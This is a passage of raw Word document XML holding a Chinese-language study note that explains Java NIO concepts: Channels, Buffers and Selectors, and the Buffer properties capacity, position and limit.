              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId115" tgtFrame="&quot;_blank&quot;" tooltip="&quot;点击查看大图&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a.hiphotos.baidu.com/zhidao/wh%3D600%2C800/sign=a0253cedfff2b211e47b8d48fab04900/1c950a7b02087bf4bacc0d77f6d3572c11dfcf08.jpg">
                      <a:hlinkClick r:id="rId115" tgtFrame="&quot;_blank&quot;" tooltip="&quot;点击查看大图&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId116" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5711825" cy="1303655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F512D8" w:rsidRPr="00F41A4C" w:rsidRDefault="00F512D8" w:rsidP="00F512D8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F512D8" w:rsidRPr="00F41A4C" w:rsidRDefault="00F512D8" w:rsidP="00F512D8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C1202F" w:rsidRPr="00F41A4C" w:rsidRDefault="003F4C0C" w:rsidP="003F4C0C">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0.2</w:t>
      </w:r>
      <w:r w:rsidR="00C1202F" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00C1202F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NIO</w:t>
      </w:r>
      <w:r w:rsidR="00C1202F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>概念与原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F512D8" w:rsidRPr="00F41A4C" w:rsidRDefault="002D7FD8" w:rsidP="00151FA9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nio:</w:t>
      </w:r>
      <w:r w:rsidR="00151FA9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>new io,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>或者是非阻塞</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D7FD8" w:rsidRPr="00F41A4C" w:rsidRDefault="00471106" w:rsidP="004867CA">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>核心组成部分：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  Channels</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>（通道）、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Buffers</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>（缓冲区）、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Selectors(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>选择器</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00871DEC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004867CA" w:rsidRPr="00F41A4C" w:rsidRDefault="004867CA" w:rsidP="004867CA">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Selector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>允许单线程处理多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Channel</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。如果你的应用打开了多个连接（通道），但每个连接的流量都很低，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Selector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>就会很方便。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004867CA" w:rsidRPr="00F41A4C" w:rsidRDefault="006C70C0" w:rsidP="004867CA">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>要使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Selector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，得向</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Selector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>注册</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Channel</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865FD1" w:rsidRPr="00F41A4C" w:rsidRDefault="006752A9" w:rsidP="006752A9">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00865FD1" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  NIO</w:t>
      </w:r>
      <w:r w:rsidR="00865FD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00865FD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Buffer</w:t>
      </w:r>
      <w:r w:rsidR="00865FD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE25E8" w:rsidRDefault="00AD4FAC" w:rsidP="004867CA">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有三个属性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:capacity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD4FAC" w:rsidRDefault="00BA3978" w:rsidP="004867CA">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apacity: Buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最大容量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA3978" w:rsidRDefault="00BA3978" w:rsidP="004867CA">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>position:</w:t>
      </w:r>
      <w:r w:rsidR="003E2151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写模式时，</w:t>
      </w:r>
      <w:r w:rsidR="003E2151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r w:rsidR="003E2151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示当前位置。从写切换到读时，</w:t>
      </w:r>
      <w:r w:rsidR="003E2151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r w:rsidR="003E2151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会被重置为</w:t>
      </w:r>
      <w:r w:rsidR="003E2151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E2151" w:rsidRDefault="003E2151" w:rsidP="004867CA">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>imit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写模式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,Buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示你最多能往</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里写多少数据。写模式下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>capacity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当切换到读模式时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r w:rsidR="008A5863">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示你最多能读到多少数据，</w:t>
      </w:r>
      <w:r w:rsidR="008A5863">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r w:rsidR="008A5863">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会被设置成写模式下的</w:t>
      </w:r>
      <w:r w:rsidR="00EC661A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r w:rsidR="008A5863">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D33558" w:rsidRDefault="00D33558" w:rsidP="004867CA">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3105">
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通道是一个对象，通过它可以读取和写入数据，当然了所有数据都通过</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3105">
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3105">
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象来处理。我们永远不会将字节直接写入通道中，相反是将数据写入包含一个或者多个字节的缓冲区。同样不会直接从通道中读取字节，而是将数据从通道读入缓冲区，再从缓冲区获取这个字节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00E2B" w:rsidRDefault="00B62648" w:rsidP="00F00E2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F00E2B">
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>在缓冲区中，最重要的属性有下面三个，它们一起合作完成对缓冲区内部状态的变化跟踪：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00E2B" w:rsidRDefault="00B62648" w:rsidP="00F00E2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00F00E2B">
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>osition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00F00E2B">
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>指定了下一个将要被写入或者读取的元素索引，它的值由</w:t>
      </w:r>
      <w:r w:rsidR="00F00E2B">
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>get()/put()</w:t>
      </w:r>
      <w:r w:rsidR="00F00E2B">
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法自动更新，在新创建一个</w:t>
      </w:r>
      <w:r w:rsidR="00F00E2B">
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Buffer</w:t>
      </w:r>
      <w:r w:rsidR="00F00E2B">
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>对象时，</w:t>
      </w:r>
      <w:r w:rsidR="00F00E2B">
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r w:rsidR="00F00E2B">
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>被初始化为</w:t>
      </w:r>
      <w:r w:rsidR="00F00E2B">
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00F00E2B">
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
